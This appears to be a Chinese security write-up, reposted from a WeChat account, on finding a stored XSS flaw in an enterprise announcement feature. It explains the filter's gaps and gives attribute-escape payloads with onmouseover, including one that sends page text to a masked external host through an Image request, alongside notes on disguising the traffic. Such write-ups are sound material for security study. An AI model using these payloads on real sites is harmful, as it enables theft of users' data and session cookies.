本文章所分享内容仅用于网络安全相关的技术讨论和学习，注意，切勿用于违法途径，所有渗透测试都需要获取授权，违者后果自行承担，与本文章及作者无关，请谨记守法。

0x1. 概述

由于漏洞系统比较敏感，下面涉及域名地址的相关图片我就只能厚码打上，感谢各位看官的支持与理解!!!

0x2. 正文

0x01 漏洞发现：

进入系统后就发现有发布公告的功能点，当然会测试一番，好家伙，被过滤了，在换，再试，然后看js，确实过滤，就不断尝试，burp改包发包验证，常规xss语句看来是弹窗不了；不要问我为什么就觉得这里有问题，问就是凭借直觉和它做了过滤动作，必定有没有过滤到位的，自然也就坚持去搞搞。

然后就看了，发布公告的里面输入框具体过滤什么，分析后就开始绕过之路！！！

从js可以知道存在前端过滤+符号转义+禁用字符检测，同时也分析发现前端过滤机制excludeSpecial()函数被注释无效，containSpecial()仅检测$^<>和script关键词，就是使用绕过特殊字符检测，采用无尖括号事件处理器：onmouseover代替onload。

0x02 验证漏洞：

分析后就如下方式尝试构造如下3个poc进行绕过：

1. 语法构造优化

• " x="：强制闭合原始属性

• 空格分隔：绕过空格过滤检测

• 省略引号：采用无引号事件调用

1. 特征规避技术

• 避免使用黑名单字符：<>$^等

• 避开关键词：不使用script/js/http等

• 使用低频事件处理器：onmouseover> onclick

" onmouseover="alert(1)" x="1. 关键字符检测仅限 [$^<>]，空格/引号/括号均被放行2. "script"检测可通过事件处理器绕过3. 未监控Image对象请求外部资源行为  

DOM精准渗透/流量伪装技术：

" onmouseover="alert(document.cookie)" x="    " onmouseover="  (new Image).src='https://x.xxx.xx.xx:8000/log?k='+encodeURIComponent(    document.querySelector('.th_bg').innerText  )" x=" .th_bg             // 定位企业公告核心DOM节点.innerText         // 文本提取避开HTML结构干扰encodeURIComponent // 规避特殊字符警报(new Image).src=   // 伪装图片请求'http://'+IP+端口   // 绕过协议关键字检测/log?k=            // 模拟正常日志请求

漏洞核心突破点：

• 无视containSpecial()函数对$^<>和script的检测

• 利用前端过滤失效实现HTML属性逃逸

• 实现从基础弹窗到业务数据窃取的攻击

• 输入检测盲区 + 渲染层无过滤 = 持久化攻击链

0x3. 总结

根本漏洞链：     无效过滤函数 → 事件处理器白名单缺失 → 属性逃逸构造 → DOM数据渗出

完整漏洞链：

渗透测试链路：

过滤检测 → 属性逃逸 → 事件注入 → 数据提取 → 外传通道//坚持自己选择，不要遇到绕不过的就放弃了，毕竟有很多事情，不起尝试怎么知道自己不行咯！

0x4. 最后忠告

XSS漏洞挖掘的本质是语法与规则的对抗。成功的挖掘必须建立在：

1. 对过滤机制的逆向解构

1. 业务场景数据节点的测绘

1. 渗出通道的隐蔽性保障 保持对空格/引号/括号等基础语法元素的敏感性，往往比追求复杂攻击技术更有成效！

原文始发于微信公众号（船山信安）：记录某企业存储型XSS漏洞从发现到数据外泄全路径分析